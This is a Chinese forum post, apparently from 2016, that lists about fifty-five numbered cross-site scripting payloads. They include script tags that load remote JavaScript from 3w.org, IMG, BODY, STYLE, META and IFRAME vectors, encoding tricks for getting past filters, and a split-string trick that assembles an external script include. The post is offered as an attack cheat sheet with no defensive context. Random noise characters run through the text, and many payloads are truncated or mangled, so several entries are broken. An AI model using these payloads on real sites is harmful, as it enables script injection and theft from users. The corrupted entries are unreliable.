(1)普通的XSS JavaScript注入, R9 k- S# `1 f( i0 {/ C, [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ C. h$ G$ a; f4 b; s1 f: X9 j
(99)另类弹框
4 R/ x9 z- A; ]! i D1 d# f<q/oncut=alert()>1" j7 w: Z8 O( q% Z
<s/onclick=alert()>b
' A9 w, a1 G/ V$ _) a; f0 x <XSS=" onclick="alert(1)//">clickme</SSX=">0 t% h- C2 b6 ~& A
<zzz onclick=alert`1`>clickme</zzz> 2 Z2 H/ t4 o5 x
<a onclick=alert`1`>clickme</a>
! {3 t0 e# M7 n9 z<a=">clickme</a=">
; f, i0 d$ H" v4 E<a=">clickme</a>
- X3 i, S) L+ o/ e/ c. i<z=">clickme</z=">, C) M9 a* H+ ^6 G' t9 K4 o
<z onclick=alert`1`>clickme</z>
7 Y. r4 D- j( ?7 y3 Y- X# f, V2 Y2 S0 ~) v/ Q: X$ e0 p+ w
(2)IMG标签XSS使用JavaScript命令
M5 {. H |7 A' H# s$ D<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 s5 D1 r- D- B* }; x, x: h v) f W
; k9 ?6 {4 L1 A1 b" G2 X
(3)IMG标签无分号无引号
1 a/ @+ [* _/ ~& W- F, w, F( C<IMG SRC=javascript:alert(‘XSS’)>
, R. h6 w, _, [! h( j( E, h+ O) a; f5 G7 s4 f2 ^
(4)IMG标签大小写不敏感
) H h$ i' m0 ^2 ]<IMG SRC=JaVaScRiPt:alert(‘XSS’)>& G$ y J$ G7 D7 F2 C7 X
& Y, S$ I( P' x# ~# Y(5)HTML编码(必须有分号)8 e1 I7 S, b. \ {; c9 Y
<IMG SRC=javascript:alert(“XSS”)>
6 h. d7 M C# N$ v* a& s+ d5 Z2 s( }
(6)修正缺陷IMG标签
" c6 c* C1 E# q! [- V6 s<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
) L$ c' `/ \4 c* a4 v3 v
5 v# i" E$ B4 {: z* C8 g/ e(7)formCharCode标签(计算器)
2 d6 A& x" E( I" Z: b+ i H2 `<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. o' k" `: U$ u5 {# G
& {2 c: e2 U- e' {- O4 p
(8)UTF-8的Unicode编码(计算器)
* T, o* Q2 J) \# `<IMG SRC=jav..省略..S')>2 S" ~* z$ d7 E5 V5 R [% z
) f- ^' n/ t5 Y, j5 H- s& ~
(9)7位的UTF-8的Unicode编码是没有分号的(计算器), ?7 E& U1 _4 W+ f! A- W1 u
<IMG SRC=jav..省略..S')>9 I7 u1 w% v; N8 a
. p7 Q+ z- r; `1 R! D
(10)十六进制编码也是没有分号(计算器)9 T% G2 H U" z6 K! |
<IMG SRC=\'#\'" /span>
& b" d4 T: c7 E( x4 n }
, ] Y3 U5 _9 C5 q" P9 w& `(11)嵌入式标签,将Javascript分开
$ n/ l$ R: N3 L8 Z5 x<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
% B4 @9 H8 y( r; D2 z; K E O/ H" P/ V" B
(12)嵌入式编码标签,将Javascript分开! E/ @, k' p1 Y
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 e. u+ I: B0 n* j
. X+ n& W( a8 _( X0 O2 A9 n(13)嵌入式换行符8 D2 n" o; K% y+ \
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 T& M" S d+ R6 P, i, ^; ~( O$ C h
8 w0 B9 P g& s% ]
(14)嵌入式回车
" V9 @; n+ w! b( n, [8 ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
; ^8 D3 c2 I' G* l" j' K" j- i, d
(15)嵌入式多行注入JavaScript,这是XSS极端的例子* b4 N. g! ]; z5 [ m
<IMG SRC=\'#\'" /span>
. }% L3 p1 k% {% Q9 _- C+ n
: ]# ^8 ~ V# P- t) |4 k(16)解决限制字符(要求同页面)
% |% t) [: K6 K0 e) C9 u+ [<script>z=’document.’</script>" g6 M5 ~ d. d
<script>z=z+’write(“‘</script>$ q$ o$ _5 a. B- D
<script>z=z+’<script’</script>
3 w& T g/ Q1 o( V+ f& [<script>z=z+’ src=ht’</script>0 a i/ @) q3 H6 o( o, m! ~% h
<script>z=z+’tp://ww’</script>" B% h. ^& e* i( {* _( k$ D2 g
<script>z=z+’w.shell’</script>
) o9 |% c* b2 p( c0 y<script>z=z+’.net/1.’</script>4 @8 S+ a) J- c1 x. G- e
<script>z=z+’js></sc’</script>
/ H1 r8 F. d, I<script>z=z+’ript>”)’</script>5 s! k' n. F4 h1 [9 P
<script>eval_r(z)</script>8 ^- U+ ?9 [' B5 z' U( t. H: v6 B. g
$ E/ H, E9 M% y
(17)空字符
! i( F$ [& q8 R+ iperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# ?) B9 W% r9 v1 ?: a* v, [5 P
" a6 @0 a+ e2 R% Y6 E/ U3 _(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. M0 R( q1 P p9 { v* w
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 l6 b* Z1 q0 l+ |: r7 Q7 z" e' o/ f. D; P& D
(19)Spaces和meta前的IMG标签
0 c; o& }1 ~- q% z( |$ S0 }<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>- a- F4 _) r/ r
}: A. Z( b4 R7 G6 u0 C) w8 ~(20)Non-alpha-non-digit XSS& O+ D3 k8 t" \/ O; ?* r- d
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
, E% r# M4 g( x7 b ]$ j% ]9 S: J
! S" Y8 ]3 C3 @(21)Non-alpha-non-digit XSS to 25 G: E! o& N4 z; M1 Q$ A+ `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 R7 T s5 f4 b! Z
/ v" t0 c4 s' U4 f(22)Non-alpha-non-digit XSS to 3
/ f. Y" K: J6 y( j<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT> y- q- V' W K
, g* a& A6 ]4 v' ^ B# L(23)双开括号
8 S) d! c. g/ ?4 M<<SCRIPT>alert(“XSS”);//<</SCRIPT>( p: f/ J5 \# B8 l5 _: @
- T5 s5 t% W1 i3 c# K. k& {(24)无结束脚本标记(仅火狐等浏览器)0 B& W7 ^- h. e' ^
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
, R2 a4 c S. {' s. S) ~: t7 P: i
1 u1 J, X# K5 ]* }* ?(25)无结束脚本标记28 f7 C( S) l: r+ x6 U4 M
<SCRIPT SRC=//3w.org/XSS/xss.js>, _; Y! H5 y9 _. |6 C
+ {* {$ @/ v; L: D* K; b9 a
(26)半开的HTML/JavaScript XSS' R8 p# I( T$ g7 H( u- u( M. }
<IMG SRC=\'#\'" /span>( H1 @6 ]# E% [8 }
# S, s( R( X) n$ n0 V& b
(27)双开角括号
2 m9 M- i) L! E/ P<iframe src=http://3w.org/XSS.html <
0 f3 }1 f5 r" a! d& U. \ j' V# ~8 e) }
(28)无单引号 双引号 分号
. V; ]+ H/ O2 |: N) u<SCRIPT>a=/XSS/( t6 j& D# `5 y8 s5 O: ^2 r
alert(a.source)</SCRIPT>' J9 s% Q- q/ w+ D3 k
, O( K( p) `" z$ v$ o! O' o(29)换码过滤的JavaScript& [% R+ j& t$ P ^; N7 Z% |3 G
\”;alert(‘XSS’);//
: G& E' t( A' p, I7 g
% \8 J4 ~- n+ p2 D& e8 g(30)结束Title标签6 U% k3 ?- e( R; K A2 Y) m
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>; o+ k# Q! m+ `& }$ K
( o' y' H2 ~& r7 U$ M- q
(31)Input Image
- l! b! @3 X' t<INPUT SRC=\'#\'" /span>( I, a& S3 W( l, F: Z3 e3 N" z
0 `2 ?+ @: l! \% N( ]
(32)BODY Image# E. k% ?4 T' `; n
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: Y5 Z; c M6 @% m* o) F1 d
$ p2 K. d+ U8 c$ C8 E1 z- N(33)BODY标签
3 o: T! ]0 b6 c3 }2 X" s; R: u<BODY(‘XSS’)>
7 s/ c) v. e& J4 I9 T
* @( W: s0 _ K% D; U7 c5 }(34)IMG Dynsrc
! h) p' @- _7 n1 {% M<IMG DYNSRC=\'#\'" /span>8 v/ _1 n; b3 @8 N. ]) `
& ^1 R8 V! k: {& z" I(35)IMG Lowsrc
% _# _( s: `- u<IMG LOWSRC=\'#\'" /span>+ a5 ~" P2 c" o
5 @- P4 d8 {* T3 `(36)BGSOUND* C$ Y2 @9 |# r( ]8 e
<BGSOUND SRC=\'#\'" /span>! ?0 r9 H8 q, v* w# ^2 @
- Y+ D, [# J. V(37)STYLE sheet
, C/ g5 j. ^+ w# ?* y# l" X<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
! T- H& L* {1 \2 q4 x1 ~/ ?0 K' S2 m% U% S2 g* p
(38)远程样式表
; K& X: X9 p5 j" B9 g/ b<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" Q& c; v$ Y% Y- L4 F
5 k$ O5 `5 N, E0 Q+ k& ^
(39)List-style-image(列表式)
! G* G | W. d: @' i<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 T+ x1 d& `! C1 M5 E* K
6 L. {8 `5 z) f9 A6 p- m
(40)IMG VBscript$ L$ p3 ]* Z$ w b% U/ n
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS1 w$ {5 V7 w e* c( t
* `( c" ?8 q6 ^" Z
(41)META链接url0 h& a1 Z# n0 {2 c$ H) x+ N6 Z
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 G: E- i1 H! ?/ h$ s( G0 A0 h* U0 l! S( ?$ R
(42)Iframe2 F. C3 S5 `9 l' }; `, Y+ P1 s
<IFRAME SRC=\'#\'" /IFRAME>" y; `. s( w: S% e" `, q
U. s- @2 i4 O) h6 ^4 A) v(43)Frame
* s, o* Q( a3 y( P- o( T<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>0 X6 a6 N, V& `3 B+ S! {+ m1 k( R
9 t: \ @- r6 c+ X
(44)Table
7 D$ r) E" w! c) \9 Y<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 O/ V! d. K# t# B/ }& Z' m. I9 b2 N. d( g, _2 ~3 S
(45)TD+ D9 F: A5 h8 U" E4 }( C+ B7 J3 h
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 g2 [1 {7 z& z4 J. \+ ?. ?4 r4 b+ v! r+ F
(46)DIV background-image
% Q/ d, E- `2 y( e<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* [& D7 K8 }3 V7 [6 K7 E c; d$ O( C- n' N6 j, N# D
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
# a z f$ O3 e& ]+ ^. X' H4 N<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
3 I* l& `2 Z7 L$ z9 q+ L) L1 ?) o) @( m6 G4 q) A: a4 B
(48)DIV expression1 ?! d+ J: F# c) G: ?1 ^
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>/ K* T, ~- ?: B2 J
6 M6 x* n% Z$ m& [(49)STYLE属性分拆表达) d. `" t2 E" y7 M# Q% n. Z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- i4 Y v7 f4 c, e
1 ~# J1 b# p' t' Z& J, v5 {(50)匿名STYLE(组成:开角号和一个字母开头)* ^1 U L$ R+ Z# D
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 ~8 p C) _' d5 u* d0 a
. p! ?8 w! x6 E3 L(51)STYLE background-image
4 i$ F$ Z" d2 [# b: O& W<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>. J& _! |6 E; {7 G1 e, q2 {! F+ C- |
+ {+ u1 o1 Y( M7 e" B# U/ ?(52)IMG STYLE方式/ g3 B0 W4 s# C. \8 X+ f/ r1 I/ W
exppression(alert(“XSS”))’>8 N& q0 {' F) y3 U. Y
& A" f$ O+ D1 K# {6 Z(53)STYLE background. ]) T! n9 I6 {* g7 P
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>& O2 B* `$ M: B6 [: N3 ?% r4 \
6 `, Q3 y% `( O(54)BASE
) H- j- i0 |! J: n<BASE HREF=”javascript:alert(‘XSS’);//”>8 Y4 N4 R0 I$ N! \0 I5 f2 F- D! f" K
_. N! [ c. n, x& M9 b3 a2 L! }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" V$ H3 N( b" a+ a+ x. A: B<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>; c. F# v4 n- }
|
发表于 2016-4-28 10:06:15
收藏
支持
反对